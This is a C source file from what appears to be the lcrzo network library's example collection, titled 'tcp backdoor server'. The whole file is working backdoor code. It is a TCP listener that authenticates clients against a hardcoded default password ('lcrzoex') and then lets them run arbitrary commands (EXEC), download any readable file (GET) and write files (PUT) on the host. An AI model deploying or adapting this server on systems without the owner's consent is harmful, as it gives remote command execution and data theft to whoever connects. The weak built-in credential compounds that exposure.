#ifndef LCRZOEX_000216_INCLUDED
#define LCRZOEX_000216_INCLUDED 1

/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000216=
{ /*reference*/     "lcrzoex", 216,
  /*version*/       1, 0,
  /*title*/         "tcp backdoor server",
  /*french title*/  "server tcp backdoor",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port",
  /*french usage*/  "nom_serveur port_serveur",
  /*usage example*/ "1.2.3.4 5566",
  /*fr. usage ex.*/ "1.2.3.4 5566",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000216_main(int argc, char *argv[]);
int lcrzoex_000216_msg(lcrzo_sock *psock,
		       lcrzo_uint16 errorcode,
		       lcrzo_bool follow,
		       lcrzo_conststring frmsg,
		       lcrzo_conststring usmsg);
int lcrzoex_000216_mustbeauth(lcrzo_sock *psock,
			      lcrzo_conststring command);
int lcrzoex_000216_server(lcrzo_sock *psock, lcrzo_ptr pinfos);
int lcrzoex_000216_help(lcrzo_sock *psock);
int lcrzoex_000216_auth(lcrzo_sock *psock, 
			lcrzo_bool *pisauthenticated,
			lcrzo_conststring parameters,
			lcrzo_conststring serverrand,
			lcrzo_conststring passwd);
int lcrzoex_000216_exec(lcrzo_sock *psock, 
			lcrzo_bool isauthenticated,
			lcrzo_conststring parameters);
int lcrzoex_000216_get(lcrzo_sock *psock, 
		       lcrzo_bool isauthenticated,
		       lcrzo_conststring parameters);
int lcrzoex_000216_put(lcrzo_sock *psock, 
		       lcrzo_bool isauthenticated,
		       lcrzo_conststring parameters);

/*-------------------------------------------------------------*/
/* error codes */
#define LCRZOEX_000216_ERR_OK            100
#define LCRZOEX_000216_ERR_OKBYE         101
#define LCRZOEX_000216_ERR_BADLINE       200
#define LCRZOEX_000216_ERR_UNSUPCOMMAND  201
#define LCRZOEX_000216_ERR_DOUBLEAUTH    202
#define LCRZOEX_000216_ERR_NOTAUTH       203
#define LCRZOEX_000216_ERR_CANTEXEC      204
#define LCRZOEX_000216_ERR_CANTGET       205
#define LCRZOEX_000216_ERR_CANTWRITE     206
#define LCRZOEX_000216_ERR_BADAUTH       207

/*-------------------------------------------------------------*/
/* password : you may change it */
#define LCRZOEX_000216_PASSWORD "lcrzoex"

/*-------------------------------------------------------------*/
/* timeout for reading from socket, in seconds */
#define LCRZOEX_000216_TIMEOUT_COM 60
#define LCRZOEX_000216_TIMEOUT_PUT 10


/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000216_main(int argc, char *argv[])
{ lcrzo_ipl serveripl;
  lcrzo_uint16 serverport;
  lcrzo_string passwd;
  int ret;

  lcrzo_init();

  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000216, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize IP address */
  lcrzo_epr(shared_para_ipl_init_listen(argv[1], &serveripl));

  /* initialize port numbers */
  lcrzo_epr(shared_para_port_init_listen(argv[2], &serverport));

  /* initialize the socket */
  lcrzo_epr(lcrzo_string_initm_text(LCRZOEX_000216_PASSWORD, &passwd));
  ret=lcrzo_sock_tcpmulser_real2(serveripl, serverport, NULL, 0,
				 &lcrzoex_000216_server, passwd);
  lcrzo_epr(lcrzo_string_free2(&passwd));
  lcrzo_epr(ret);

  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_msg(lcrzo_sock *psock,
		       lcrzo_uint16 errorcode,
		       lcrzo_bool follow,
		       lcrzo_conststring frmsg,
		       lcrzo_conststring usmsg)
{ lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_int16 language;

  lcrzo_epr(lcrzo_global_get_language(&language));

  lcrzo_epr(lcrzo_data_initm_uint16(errorcode, "%u", &data, &datasize));
  if (follow)
  { lcrzo_epr(lcrzo_data_appendm_char('-', 1, datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_char(' ', 1, datasize, &data, &datasize));
  }

  if ( language==LCRZO_GLOBAL_LANG_FR )
  { lcrzo_epr(lcrzo_data_appendm_text(frmsg, datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_text(usmsg, datasize, &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));

  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_mustbeauth(lcrzo_sock *psock,
			      lcrzo_conststring command)
{ lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_int16 language;

  lcrzo_epr(lcrzo_global_get_language(&language));

  lcrzo_epr(lcrzo_data_initm_uint16(LCRZOEX_000216_ERR_NOTAUTH, "%u", 
				    &data, &datasize));
  if ( language==LCRZO_GLOBAL_LANG_FR )
  { lcrzo_epr(lcrzo_data_appendm_text(
			        " il faut etre authentifie pour employer ", 
				      datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_text(" must be authenticated to use ", 
				      datasize, &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));

  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_server(lcrzo_sock *psock, lcrzo_ptr pinfos)
{ lcrzo_data data;
  lcrzo_int32 datasize, stoptoloop;
  lcrzo_string command, parameters, serverrand;
  lcrzo_regexp re;
  lcrzo_time maxwaitingtime;
  lcrzo_bool isauthenticated;
  lcrzo_int16 language;
  int ret;

  command=NULL;
  parameters=NULL;

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  /* initialize server rand */
  lcrzo_epr(lcrzo_string_initm_rand(33, 126, 16, &serverrand));

  /* print the banner */
  lcrzo_epr(lcrzo_data_initm_uint16(LCRZOEX_000216_ERR_OK, "%u", 
				    &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" ", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(serverrand, datasize, &data, &datasize));
  if ( language==LCRZO_GLOBAL_LANG_FR )
  { lcrzo_epr(lcrzo_data_appendm_text(" (utilisez le client special)\n",
				      datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_text(" (use the special client)\n",
				      datasize, &data, &datasize));
  }
  ret=lcrzo_sock_write(psock, data, datasize);
  lcrzo_epr(lcrzo_data_free2(&data));
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_epr(lcrzo_string_free2(&serverrand));
    return(ret);
  } 

  isauthenticated=LCRZO_FALSE;
  stoptoloop=0;
  while(!stoptoloop) 
  {
    /* read a line */
    lcrzo_epr(lcrzo_time_init_sec(LCRZOEX_000216_TIMEOUT_COM, 
				  &maxwaitingtime));
    ret=lcrzo_sock_readm_line(psock, &maxwaitingtime, &data, &datasize);
    if ( ret!=LCRZO_ERR_OK ) { stoptoloop=1; break; }
    /* ignore empty lines */
    if (datasize==0)
    { lcrzo_epr(lcrzo_data_free2(&data));
      continue;
    }
    /* print the read data */
    /*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_DUMP));*/
    /* separate command and parameters */
    ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
				 "^[ \t]*([A-Za-z]+)[ \t]*(.*)[ \t]*$", re);
    if ( ret!=LCRZO_ERR_OK )
    { /* unrecognized command */
      lcrzo_epr(lcrzo_data_free2(&data));
      ret=lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_BADLINE,
			     LCRZO_TRUE, 
                "la ligne n'a pas la forme \"commande [parametres]\"",
		"the line hasn't the format \"command [parameters]\"");
      if ( ret!=LCRZO_ERR_OK ) { stoptoloop=2; break; }
      ret=lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_BADLINE,
			     LCRZO_FALSE, 
			     "entrez \"HELP\" pour l'aide",
			     "enter \"HELP\" for help");
      if ( ret!=LCRZO_ERR_OK ) { stoptoloop=2; break; }
      continue;
    }
    /* set command and parameters */
    data[datasize]='\0';
    ret=lcrzo_string_initm_range((lcrzo_string)data, re[1].startindex_positive,
				 re[1].endindex_positive, &command);
    if ( ret!=LCRZO_ERR_OK ) { stoptoloop=2; break; }
    if ( re[1].startindex_positive==0 && re[1].endindex_positive==0 )
    { ret=lcrzo_string_initm_text("", &parameters);
    }
    else
    { ret=lcrzo_string_initm_range((lcrzo_string)data, 
				   re[2].startindex_positive,
				   re[2].endindex_positive,&parameters);
    }
    lcrzo_epr(lcrzo_data_free2(&data));
    if ( ret!=LCRZO_ERR_OK ) { stoptoloop=3; break; }
    /* call functions corresponding to commands */
    /* if we read 'QUIT', we exit */
    if ( ! shared_misc_strcasecmp(command, "quit") ) 
    { ret=lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OKBYE,
			     LCRZO_FALSE, "au revoir", "bye");
      stoptoloop=4;
      break;
    }
    /* if we read 'HELP', we print usage */
    else if ( ! shared_misc_strcasecmp(command, "help") )
    { ret=lcrzoex_000216_help(psock);
    }
    /* if we read 'AUTH', we authenticate */
    else if ( ! shared_misc_strcasecmp(command, "auth") )
    { ret=lcrzoex_000216_auth(psock, &isauthenticated, parameters,
			      serverrand, (lcrzo_conststring)pinfos);
    }
    /* if we read 'EXEC', we execute a command */
    else if ( ! shared_misc_strcasecmp(command, "exec") )
    { ret=lcrzoex_000216_exec(psock, isauthenticated, parameters);
    }
    /* if we read 'GET', we get a file */
    else if ( ! shared_misc_strcasecmp(command, "get") )
    { ret=lcrzoex_000216_get(psock, isauthenticated, parameters);
    }
    /* if we read 'PUT', we put a file */
    else if ( ! shared_misc_strcasecmp(command, "put") )
    { ret=lcrzoex_000216_put(psock, isauthenticated, parameters);
    }
    /* unknown command */
    else
    { lcrzo_epr(lcrzo_data_initm_uint16(LCRZOEX_000216_ERR_UNSUPCOMMAND, "%u",
					&data, &datasize)); 
      if ( language==LCRZO_GLOBAL_LANG_FR )
      { lcrzo_epr(lcrzo_data_appendm_text("-la commande ", datasize, 
					  &data, &datasize)); 
        lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data,&datasize));
        lcrzo_epr(lcrzo_data_appendm_text(" est non supportee\n",
					  datasize, &data, &datasize));
        lcrzo_epr(lcrzo_data_appendm_uint16(LCRZOEX_000216_ERR_UNSUPCOMMAND,
					    "%u",
					    datasize, &data, &datasize)); 
	lcrzo_epr(lcrzo_data_appendm_text(" entrez \"HELP\" pour l'aide\n",
					  datasize, &data, &datasize)); 
      }
      else
      { lcrzo_epr(lcrzo_data_appendm_text("-the command ", datasize, 
					  &data, &datasize)); 
        lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data,&datasize));
        lcrzo_epr(lcrzo_data_appendm_text(" isn't supported\n",
					  datasize, &data, &datasize));
        lcrzo_epr(lcrzo_data_appendm_uint16(LCRZOEX_000216_ERR_UNSUPCOMMAND,
					    "%u",
					    datasize, &data, &datasize)); 
        lcrzo_epr(lcrzo_data_appendm_text(" enter \"HELP\" for help\n",
					  datasize, &data, &datasize)); 
      }
      ret=lcrzo_sock_write(psock, data, datasize);
      lcrzo_epr(lcrzo_data_free2(&data));
    }
    if ( ret!=LCRZO_ERR_OK ) { stoptoloop=4; break; }
    
    /* free memory */ 
    lcrzo_epr(lcrzo_string_free2(&command));
    lcrzo_epr(lcrzo_string_free2(&parameters));    
  }

  /* free memory depending on stopping location */ 
  if (stoptoloop==1)
  { lcrzo_epr(lcrzo_string_free2(&serverrand));
  }
  else if (stoptoloop==2)
  { lcrzo_epr(lcrzo_data_free2(&data));
    lcrzo_epr(lcrzo_string_free2(&serverrand));
  }
  else if (stoptoloop==3)
  { lcrzo_epr(lcrzo_string_free2(&command));
    lcrzo_epr(lcrzo_string_free2(&serverrand));
  }
  else if (stoptoloop==4)
  { lcrzo_epr(lcrzo_string_free2(&parameters));
    lcrzo_epr(lcrzo_string_free2(&command));
    lcrzo_epr(lcrzo_string_free2(&serverrand));
  }

  return(LCRZO_ERR_OK);
  pinfos=pinfos; /*just for the compiler warning*/
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_help(lcrzo_sock *psock)
{
  /* print help */
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
	 "Utilisez le client special, car celui-ci comprend ces commandes",
	 "Use the special client, because it understand these commands"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
			       "HELP : affiche l'aide",
			       "HELP : display this help"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
         "AUTH aaaaaaaaaa : s'authentifie (utiliser le client special)",
         "AUTH aaaaaaaaaa : authentify (use the special client)"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
			       "GET fichier : telecharge fichier",
			       "GET file : download file"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
			       "PUT fichier : uploade fichier",
			       "PUT file : upload file"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_TRUE,
			       "EXEC commande : execute la commande",
			       "EXEC command : execute the command"));
  lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			       LCRZO_FALSE,
			       "QUIT : quitte",
			       "QUIT : leave"));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_auth(lcrzo_sock *psock,
			lcrzo_bool *pisauthenticated,
			lcrzo_conststring parameters,
			lcrzo_conststring serverrand,
			lcrzo_conststring passwd)
{ lcrzo_regexp re;
  lcrzo_string clientrand, receivedhash, computedhash;
  lcrzo_int16 language;
  int ret;

#if 0
  /* to debug, desactivate authentication */
  *pisauthenticated=LCRZO_TRUE; 
  return(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			    LCRZO_FALSE, "OK", "OK"));
#endif

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  /* already authenticated */
  if (*pisauthenticated)
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_DOUBLEAUTH,
				 LCRZO_FALSE,
				 "deja authentifie",
				 "already authenticated"));
    return(LCRZO_ERR_OK);
  }

  /* read credentials */
  ret=lcrzo_string_search_regexp(parameters, LCRZO_FALSE, +1, -1,
      "^(................) (........................................)$", re);
  if ( ret!=LCRZO_ERR_OK )
  { /* unrecognized credentials */
    lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_BADAUTH,
				 LCRZO_FALSE,
				 "auth mal formatee", "auth badly formated"));
    return(LCRZOEX_ERR_MISC_BADRESPONSE);
  }
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[1].startindex_positive,
				     re[1].endindex_positive, &clientrand));
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[2].startindex_positive,
				     re[2].endindex_positive, &receivedhash));

  /* compute wanted credentials */
  lcrzo_epr(shared_misc_randpasshash_old(serverrand, clientrand, passwd, 
					 &computedhash));
  lcrzo_epr(lcrzo_string_free2(&clientrand));

  /* verify credentials */
  if ( strcmp(receivedhash, computedhash) )
  { /* unrecognized credentials */
    lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_BADAUTH,
				 LCRZO_FALSE,
				 "mauvais mot de passe", "bad password"));
    lcrzo_epr(lcrzo_string_free2(&receivedhash));
    lcrzo_epr(lcrzo_string_free2(&computedhash));
    return(LCRZOEX_ERR_MISC_BADRESPONSE);
  }
  lcrzo_epr(lcrzo_string_free2(&receivedhash));
  lcrzo_epr(lcrzo_string_free2(&computedhash));

  /* successful authentication */
  ret=lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
			 LCRZO_FALSE,
			 "OK", "OK");
  *pisauthenticated=LCRZO_TRUE;

  return(ret);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_exec(lcrzo_sock *psock,
			lcrzo_bool isauthenticated,
			lcrzo_conststring parameters)
{ lcrzo_data data, output;
  lcrzo_int32 datasize, outputsize;
  lcrzo_ipc ipc;
  shared_misc_ipcexec smi;
  lcrzo_int16 language;
  int ret;

  /* must be authenticated */
  if (!isauthenticated)
  { lcrzo_epr(lcrzoex_000216_mustbeauth(psock, "EXEC"));
    return(LCRZO_ERR_OK);
  }

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  /* execute the given command */
  ret=shared_misc_ipcexec_init(parameters, &smi, &ipc);
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_CANTEXEC,
				 LCRZO_FALSE,
				 "ne peut pas executer cette commande",
				 "could not execute this command"));
    return(LCRZO_ERR_OK);
  }
  lcrzo_er(lcrzo_ipc_close_write(&ipc));

  /* read all data */
  lcrzo_epr(lcrzo_data_initm_text("", &output, &outputsize));
  while ( LCRZO_TRUE ) 
  { ret=lcrzo_ipc_readm(&ipc, LCRZO_WAIT_INFINITE, &data, &datasize);
    if ( ret!=LCRZO_ERR_OK )
    { if (ret==LCRZO_ERR_OKDATAEND) break;
      return(ret);
    }
    lcrzo_epr(lcrzo_data_appendm_data(data, datasize, 
				      outputsize, &output, &outputsize));
    lcrzo_epr(lcrzo_data_free2(&data));
  }
  lcrzo_epr(lcrzo_ipc_close(&ipc));
  ret=shared_misc_ipcexec_close(&smi);
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_epr(lcrzo_data_free2(&output));
    lcrzo_epr(lcrzo_err_print(ret));
    lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_CANTEXEC,
				 LCRZO_FALSE,
				 "ne peut pas executer cette commande",
				 "could not execute this command"));
    return(LCRZO_ERR_OK);
  }

  /* write error code and size */
  lcrzo_epr(lcrzo_data_initm_uint16(LCRZOEX_000216_ERR_OK, "%u", 
				    &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" ", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_int32(outputsize, "%d", datasize,
				     &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" ", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_int32(ret, "%d", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
    
  /* write data */
  lcrzo_epr(lcrzo_sock_write(psock, output, outputsize));
  lcrzo_epr(lcrzo_data_free2(&output));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_get(lcrzo_sock *psock,
		       lcrzo_bool isauthenticated,
		       lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize, filesize;
  lcrzo_file file;
  int ret;

  /* must be authenticated */
  if (!isauthenticated)
  { lcrzo_epr(lcrzoex_000216_mustbeauth(psock, "GET"));
    return(LCRZO_ERR_OK);
  }

  /* open the file */
  ret=lcrzo_file_open_read(parameters, &file);
  if (ret!=LCRZO_ERR_OK)
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_CANTGET,
				 LCRZO_FALSE,
				 "ne peut pas lire ce fichier",
				 "could not read this file"));
    return(LCRZO_ERR_OK);
  }
 
  /* write the size of the file */
  lcrzo_epr(lcrzo_file_size(&file, &filesize));
  lcrzo_epr(lcrzo_data_initm_uint16(LCRZOEX_000216_ERR_OK, "%u", 
				 &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(" ", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_int32(filesize, "%d", 
				     datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));

  /* write file data */ 
  while ( lcrzo_file_readm(&file, LCRZO_WAIT_INFINITE, &data, &datasize)
	  == LCRZO_ERR_OK ) 
  { lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_epr(lcrzo_data_free2(&data));
  }
  lcrzo_epr(lcrzo_file_close(&file));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000216_put(lcrzo_sock *psock,
		       lcrzo_bool isauthenticated,
		       lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize, filesize, bytetoread;
  lcrzo_bool errorinopen, errorinread;
  lcrzo_file file;
  lcrzo_time maxwaitingtime;
  int ret;

  /* must be authenticated */
  if (!isauthenticated)
  { lcrzo_epr(lcrzoex_000216_mustbeauth(psock, "PUT"));
    return(LCRZO_ERR_OK);
  }

  /* get the size to read */
  lcrzo_epr(lcrzo_time_init_sec(LCRZOEX_000216_TIMEOUT_PUT, 
				&maxwaitingtime));
  lcrzo_epr(lcrzo_sock_readm_line(psock, &maxwaitingtime, &data, &datasize));
  data[datasize]='\0';
  lcrzo_er(lcrzo_int32_init_text((lcrzo_string)data, &filesize));
  lcrzo_epr(lcrzo_data_free2(&data));

  errorinopen=LCRZO_FALSE;
  errorinread=LCRZO_FALSE;
  /* open the file */
  ret=lcrzo_file_open_write(parameters, LCRZO_FALSE, LCRZO_FALSE, &file);
  if (ret!=LCRZO_ERR_OK)
  { errorinopen=LCRZO_TRUE;
  }

  /* read filesize bytes, and put them in the file (if no error) */
  bytetoread=filesize;
  while (bytetoread)
  { lcrzo_epr(lcrzo_time_init_sec(LCRZOEX_000216_TIMEOUT_PUT, 
				  &maxwaitingtime));
    lcrzo_epr(lcrzo_sock_readm(psock, &maxwaitingtime, &data, &datasize));
    if (!errorinopen)
    { lcrzo_epr(lcrzo_file_write(&file, data, datasize));
    }
    lcrzo_epr(lcrzo_data_free2(&data));
    if (datasize>bytetoread)
    { /* the client sent too much */
      errorinread=LCRZO_TRUE;
      break;
    }
    bytetoread-=datasize;
  }
  if (!errorinopen)
  { lcrzo_epr(lcrzo_file_close(&file));
  }

  /* write message */
  if ( errorinopen )
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_CANTWRITE,
				 LCRZO_FALSE,
				 "ne peut pas ecrire ce fichier",
				 "could not write this file"));
  }
  else if ( errorinread )
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_CANTWRITE,
				 LCRZO_FALSE,
				 "lu trop de caracteres",
				 "read too much bytes"));
  }
  else
  { lcrzo_epr(lcrzoex_000216_msg(psock, LCRZOEX_000216_ERR_OK,
				 LCRZO_FALSE,
				 "OK", "OK"));
  }
  return(LCRZO_ERR_OK);
}

#endif
